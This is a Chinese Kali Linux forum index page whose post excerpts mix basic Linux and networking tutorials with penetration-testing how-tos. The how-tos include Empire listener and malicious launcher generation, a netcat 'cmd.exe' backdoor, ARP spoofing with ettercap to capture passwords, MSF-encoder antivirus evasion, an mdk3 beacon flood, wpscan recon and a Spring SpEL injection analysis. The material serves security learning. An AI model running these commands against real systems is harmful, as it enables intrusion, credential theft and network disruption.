Linux Kali高级学习教程
介绍Linux KALI的使用方法和各种系统工具的下载方法。
404个主题在此版块
-
- 0 篇回复
- 3.4k 次查看
Vega 是一个免费的开源扫描器和测试平台,用于测试 Web 应用程序的安全性。Vega 可以帮助您查找和验证 SQL 注入、跨站点脚本 (XSS)、无意泄露的敏感信息和其他漏洞。它用 Java 编写,基于 GUI,可在 Linux、OS X 和 Windows 上运行。 Vega 包括一个用于快速测试的自动扫描仪和一个用于战术检查的拦截代理。Vega 可以使用 Web 语言中的强大 API 进行扩展:JavaScript。官方网页是https://subgraph.com/vega/ 步骤 1 – 要打开 Vega,请转到 Applications → 03-Web Application Analysis → Vega 第 2 步– 如果您在路径中没有看到应用程序,请键入以下命令。 步骤 3 – 要开始扫描,请单击“+”号。 步骤 4 – 输入将被扫描的网页 URL。在这种情况下,它是 metasploitable 机器→单击“下一步”。 步骤 5 – 选中要控制的模块的所有框。然后,单击“下一步”。 步骤 6 – 在以下屏幕截图中再次单击“下一步”。 步骤 7 – 单击“完成”。 步骤 8 – 如果弹出下表,单击“是”。 …
RenX6的最后回复, -
在 Meatsploit 框架下免杀的方式之一就是使用MSF编码器。其功能是对攻击载荷文件进行重新的排列编码,改变可执行文件中的代码形状,避免被杀软认出。MSF 编码器可以将原可执行程序重新编码,生成一个新的二进制文件,这个文件运行以后,MSF 编码器会将原始程序解码到内存中并执行.
flower X的最后回复, -
在 Meatsploit 框架下免杀的方式之一就是使用MSF编码器。其功能是对攻击载荷文件进行重新的排列编码,改变可执行文件中的代码形状,避免被杀软认出。MSF 编码器可以将原可执行程序重新编码,生成一个新的二进制文件,这个文件运行以后,MSF 编码器会将原始程序解码到内存中并执行.
flower X的最后回复, -
- 1 篇回复
- 227 次查看
在kali中更新执行”apt-get update”出现”Invalid signature for Kali Linux repositories“的解决方法 wget -q -O - https://archive.kali.org/archive 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/57.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
等烟雨的最后回复, -
- 0 篇回复
- 208 次查看
Empire是针对Windows平台的,使用PowerShell脚本作为攻击载荷的渗透测试攻击框架,具有stager生成提权、权限维持的功能。Empire无需powershell.exe就能运行power shell代理的功能,有许多后期漏洞利用模块。类似于msf。 在kali中安装在kali中安装很简单,我们只需执行下面命令即可。 sudo apt install powershell-empire 启动服务端这个和我们之前讲过的cs一样。有客户端和服务端。我们先来启动Empire powershell服务端 powershell-empire server 启动Empire powershell 客户端powershell-empire client 牛刀小试Empire的使用方法与msf的方法相同,先设置监听,生成木马,然后监听反弹代理。 输入Listeners进入监听页面,uselistener设置监听模式,共有7种模式 dbxhttphttp_foreignhttp_hophttp_mapihttp_commeterpreter这里,我们以http模块为例: uselistener http #监听方式为http set Port 4321 #设置端口 execute #运行 现在配置完监听模块,我们来看看怎样生成shell. 使用windows/launcher_bat模块,来生成恶意shell。 usestager windows/launcher_bat set Listener http #设置监听方式 exe…
HACK1949的最后回复, -
- 0 篇回复
- 227 次查看
前言 无论内网还是外网渗透信息收集都是非常关键,信息收集越多越准确渗透的成功率就越高。 但成功率还受到漏洞影响,漏洞受时效性影响,对于大型内网扫描速度直接影响着成功率。 漏洞时效性1-2天,扫描内网或外网需1周时间,是否会因此错过很多或许可成功的漏洞? 对于那些拥有几百上千域名的大站来说,你发现越快成功率就越高,慢管理员就打补丁了。 因此我们需要一个支持批量C段/B段甚至A段的扫描器,添加自定义模块快速检测新出漏洞。 程序简介 Ladon一款用于大型网络渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。5.7版本内置40个功能模块,通过多种协议以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、数据库等信息,漏洞检测包含MS17010、Weblogic、ActiveMQ、Tomcat、Struts2等,密码爆破11种含数据库(Mysql、Oracle、MSSQL)、FTP、SSH(Linux主机)、VNC、Windows密码(IPC、WMI、SMB)、Weblogic后台、Rar压缩包密码等,Web指纹识别模块可识别75种(Web应用、中间件、脚本类型、页面类型)等,可高度自定义插件POC支持.NET程序集、DLL(C#/Delphi/VC)、PowerShell等语言编写的插件,支持通过…
Anonymous的最后回复, -
- 0 篇回复
- 317 次查看
一:先编辑配置文件 vim/etc/ettercap/etter.conf 去掉前面的#号 #if you use iptables: #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"二:开启ARP欺骗 arpspoof -t 目标 网关 -i 设备arpspoof -i waln0 -t 192.168.1.6 192.168.1.1三:截取密码 ettercap -Tq -i wlan0 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/5.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复, -
页面永久性移走(301重定向)是一种非常重要的"自动转向"技术。网址重定向最为可行的一种办法。当用户或搜索引擎向网站服务器发出浏览请求时,服务器返回的HTTP数据流中头信息(header)中的状态码的一种,表示本网页永久性转移到另一个地址。 <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteCond %{SERVER_PORT} 80 RewriteRule ^(.*)$ https://blog.bbskali.cn/$1 [R=301,L] </IfModule> 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/4.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复, -
- 0 篇回复
- 228 次查看
初步的信息收集 命令: wpscan --url http://192.168.3.234:8081渗透结果 [+] robots.txt available under: 'http://192.168.3.234:8081/robots.txt' [!] The WordPress 'http://192.168.3.234:8081/readme.html' file exists exposing a version number [!] Full Path Disclosure (FPD) in 'http://192.168.3.234:8081/wp-includes/rss-functions.php': [+] Interesting header: LINK: <http://127.0.0.1:8081/index.php/wp-json/>; rel="https://api.w.org/" [+] Interesting header: SERVER: Apache/2.4.18 (Win32) OpenSSL/1.0.2e PHP/5.5.30 [+] Interesting header: X-POWERED-BY: PHP/5.5.30 [+] XML-RPC Interface available under: http://192.168.3.234:8081/xmlrpc.php [+] WordPress version 4.9.5 [+] WordPress theme in …
Ken1Ve的最后回复, -
- 0 篇回复
- 170 次查看
什么是svg可缩放矢量图形是基于可扩展标记语言(标准通用标记语言的子集),用于描述二维矢量图形的一种图形格式。它由万维网联盟制定,是一个开放标准。 在线网址https://svg.haowen100.com/ 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/7.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复, -
1.更新 apt-get update2.安装更新 apt-get upgrade 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/8.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复, -
- 0 篇回复
- 247 次查看
pwdpwd 查看当前目录的全路径 cd-调整所在位置(返回、打开文件夹等) cd 目录名称:打开指定的目录 cd ~:打开当前用户的主目录 cd ..:返回上一级目录 cd -:返回进入目录 cd /:打开根目录 ls-显示当前路径下所有的文件及文件夹ls -l:一列的方式查看当前目录下的文件列表 ls -a:查看当前目录下所有的文件(包括隐藏文件) ls -la:以列表的方式查看当前目录下的所有文件mkdir-创建文件目录mkdir 文件夹名称:创建文件夹 mkdir -p:递归新建多级目录 rmdir-删除文件目录 rmdir 目录名称:删除指定的目录 rmdir -p 目录名称:递归删除指定目录及中间目录 rm-删除文件或者目录 rm -f:强制删除指定的文件 rm -i:在删除前询问是否删除 rm -r:递归删除 rm -rf 目录或文件:强制删除文件或目录 rm -ri 目录或文件:在删除前询问是否确认删除 注意:因为强制删除的杀伤力太大,一般不推荐使用rm -rf进行文件删除; rm命令中不跟r参数,无法删除目录,只能删除文件。copy-复制文件或目录cp -r:递归持续复制,用于目录的复制行为 cp -f:强制复制,当有重复或其他疑问时,不会询问使用者,直接进行强制复制 cp -p:保存源文件和目录的属性 cp -i:覆盖既有目录之前先询问用户 …
Ken1Ve的最后回复, -
- 0 篇回复
- 136 次查看
影响版本Spring Framework 5.0 to 5.0.4 Spring Framework 4.3 to 4.3.14漏洞分析Spring Framework通过spring-messageing模块和STOMP代理对象通讯。根据漏洞描述可以知漏洞出现在spring-message模块 或者是 stomp-websockets模板块,下面逐一分析: spring-websockets 模块存在的敏感方法@Nullablepublic String[] decode(String content) throws IOException { return (String[])this.objectMapper.readValue(content, String[].class); } 反序列化使用的jackson组件,但是没有开启autotype功能,并且代码指定了反序列化类型为String[].class,利用jndi注入方式会导致异常,没有成功。image.png 分析spring-message模块DefaultSubscriptionRegistry类中方法addSubscriptionInternal存在expression = this.expressionParser.parseExpression(selector)(危险的SPEL表达式语句)。 根据上下文可以初步判定selector参数可以控制,但是了解SPEL注入的同学应该知道,要想达到代码执行,需要调用expression.getValue()或者expres…
Ken1Ve的最后回复, -
- 0 篇回复
- 172 次查看
下载VirtualBox并安装:https://www.baidu.com/link?url=9delYKQ6ORC2fJwk6glYdpQQpOlr6h4YHHRWQ0IK_dmFEf1Td3K28obPy-o7Ymfwy9dKK00PsW-pRHZjKycAqP9dxdyHKY2C3EhnKQqzNb_&wd=&eqid=8e13ced40000aa9c000000025ade9aed 2.下载Vagrant并安装:https://releases.hashicorp.com/vagrant/2.0.4/vagrant_2.0.4_x86_64.msi 3.在任意空目录下通过Vagrant初始化Centos7vagrant init centos/7 出现以下则表示初始化成功: A `Vagrantfile` has been placed in this directory. You are now ready to `vagrant up` your first virtual environment! Please read the comments in the Vagrantfile as well as documentation on `vagrantup.com` for more information on using Vagrant.4.安装Centos7并启动vagrant up 出现以下内容则表示安装并启动成功: Bringing machine 'default' up with 'virt…
Ken1Ve的最后回复, -
- 0 篇回复
- 157 次查看
【1】 HTTP的主要特点(1) 简单快速:客户端向服务端发送请求时,只是简单的填写请求路径和请求方法即可,然后就可以通过浏览器或其他方式将请求发送就行了 (2) 灵活:HTTP协议允许客户端和服务器端传输任意类型,任意格式的数据对象 (3) 无连接:无连接的含义就是限制每次连接只处理一个请求。服务器处理完客户的请求,并收到客户的应答后,即断开连接,采用这种传输方式可以节省传输时间。 (4) 无状态:无状态是指协议对于事务处理没有记忆功能,服务器不知道客户端是什么状态,即客户端发送HTTP请求后,服务器根据请求,会给我们发送数据,发送完后不会记录信息(使用cookie机制可以保持session,解决无状态的问题) (5) 支持客户/服务器模式 【2】 HTTP和HTTPS的区别(1) HTTPS协议需要申请证书,一般免费的证书很少,需要交费 (2) HTTP是超文本传输协议,信息是明文传输,HTTPS则是具有安全性加密传输协议 (3) HTTP和HTTPS使用的是完全不同的连接方式,用的端口也不一样,HTTP的端口号是80,HTTPS的端口号的443 (4) HTTP的连接很简单,是无连接 (5) HTTPS协议是由ssl+HTTP协议构建的可进行加密的传输,身份认证网络的协议,要比HTTP协议安全的多 【3】 HTTP返回的状态码(1)200:请求被正常处理 (2)204:请求被受理,但没有资源返回 (3)206:客户端只请求资源的一部分,服务器只对请求的部分资源…
Ken1Ve的最后回复, -
- 0 篇回复
- 146 次查看
一、/etc/passwd文件添加用户、删除用户、设置密码、用户组等 这个文件查看当前系统有哪些用户,也可以把用户ID修改为0,来是用户成为root权限的用户。更多详情参考这里 二、/etc/sudoers文件这个文件可以修改用户的权限,设置用户是否可以root权限等等 ##Allow root to run any commands anywhere root ALL=(ALL) ALL xuexuan ALL=(ALL) ALL #用户权限设置 %docker ALL=(ALL) ALL #用户组权限设置 ##Allows members of the 'sys' group to run networking, software, ##service management apps and more. #%sys ALL = NETWORKING, SOFTWARE, SERVICES, STORAGE, DELEGATING, PROCESSES, LOCATE, DRIVERS ##Allows people in group wheel to run all commands %wheel ALL=(ALL) ALL ##Same thing without a password #%wheel ALL=(ALL) NOPASSWD: ALL%wheel root用户组用户组需要使用%, xuexuan ALL=(ALL) ALL下面对这行代码进行详细的解释,用户组类似: 第一列…
Ken1Ve的最后回复, -
- 0 篇回复
- 153 次查看
mysql数据库提供了一个很好用的工具mysqldump用以备份数据库,下面将使用mysqldump命令进行备份所有数据库以及指定数据库 一、mysqldump一次性备份所有数据库数据/usr/local/mysql/bin/mysqldump -u用户名 -p密码 --all-databases > /保存路径/文件名.sql注意:以上命令直接在控制台输入即可,无须登录进入数据库操作界面 以上命令执行后,你就可以在对应路径下,找到你的备份sql文件了 二、mysqldump 一次性备份指定的多个数据库数据/usr/local/mysql/bin/mysqldump -u用户名 -p密码 --databases 数据库1 数据库2... > 保存路径/文件名.sql注意:使用以上两种方式备份的数据库,会将数据库的创建语句一起进行了备份。因此,还原时,无须先创建数据库再进行还原。有一些远程连接数据库的工具, 也提供了备份的功能,但备份的sql文件中,不一定备份了数据库创建语句,因此,还原时,要保存数据库已经创建了,否则还原不了。 三、使用source 命令恢复数据库使用source 命令,需要先登录数据库,在数据库操作界面调用该指令进行还原,语法如下 source 路径/文件名.sql 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/14.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复, -
Netcat被成为TCP/IP中的瑞士军刀,几乎可以完成网络操作中的任何操作。Nmap团队开发了Ncat作为Netcat的升级版,因为Netcat的作者在96年发布稳定版以后就放弃维护了。 1、网络连接nc mail.server.net 25类似于Telnet的功能,向25号TCP端口发起连接 2、端口扫描nc -v -z hostnameport[s]相比Nmap来说,NC的扫描实在太弱了,所以端口扫描依旧推荐使用Nmap进行 3、文件传输它可以像Cat命令一样将读取的文件重定向到网络上的另外的文件。Netcat在网络应用中既可以当做服务器端,开启本机一个监听端口,也可以作为客户端向其他服务器端口发起连接。所以,文件传输,即是在两端分别运行Netcat。 nc -L -p 4444 >receivedfile.zip此处-L启动监听模式(即作为服务器端),开启4444端口,将接受到的数据写入到文件somefile.zip中。而在发送端,只需连接该服务器端开放的端口,并选择需要发送的文件。 nc 192.168.1.43 4444 <testfile.zip4、开启后门nc -L -p 4444 -e cmd.exe以监听模式启动Netcat,开启TCP端口4444,在与客户端成功建立连接后,执行cmd.exe程序(-e cmd.exe,此处为用户打开命令行执行窗口,用户可以通过命令操作此计算机)。在客户端,直接连接目标机的4444端口即可。 nc 192.168.1.43 44445、端口转发mkfifobackpipe …
Ken1Ve的最后回复, -
局域网专用地址(内网地址) A类地址:10.0.0.0——10.255.255.255由于A类地址的网络号位数是7位,主机号是24位,所以网段比较少(做多有2的7次方-2个网络),但每个网段的主机数都很大(每个网络有2的24次方-2台PC),因此A类地址一般用于大型的公司或厂家. B类地址:172.16.0.0—-172.31.255.255由于B类地址的网络号位数是14位,主机号是16位, C类地址:192.168.0.0—192.168.255.255由于B类地址的网络号位数是21位,主机号是8位, 内网也就是局域网,最直观的就是像网吧,公司内部的电脑用交换机,HUB,路由连起来的。再通过光钎。猫接入INTERNET的。 内网IP就是国际上分配ip的时候,留出一部分ip,不在internat上用,用于内部局域网等,虽然功能一样,但不能在internat上使用。属于非注册地址,专门为组织机构内部使用。 内网的计算机以NAT(网络地址转换)协议,通过一个公共的网关访Internet。 在互联网上,有一个叫做NAT的技术,是用来转换地址的,是为了解决公网IP不够用的问题而诞生的,比如说,你的主机IP地址是192.168.12.1,这个就是一个私有的IP,这个IP是不能被路由的,也就是互联网是不认的,这个时候,你去ISP,比如电信,申请一个公网的IP,比如200.176.23.4,这个时候,你在路由器上做个NAT,把你的私有IP和你的公网IP做个映射,你就可以上网了,但是现在我们一般采用的是NAPT,就是端口映射的技术,但在IP地址规划时…
Ken1Ve的最后回复, -
- 0 篇回复
- 234 次查看
教你如何向嫂子表白,来看看大神如何告诉你! 一:在root目录下新建个txt文档,用vim编辑文档,写几段暧昧的话(写不出百度吧!) 二:终端执行命令: 命令1:先开启网卡监听模式 airmon-ng start wlan0命令2:开启无线广播 mdk3 wlan0mon b -f /root/jj.txt -c 6 -s 1000 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/24.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复,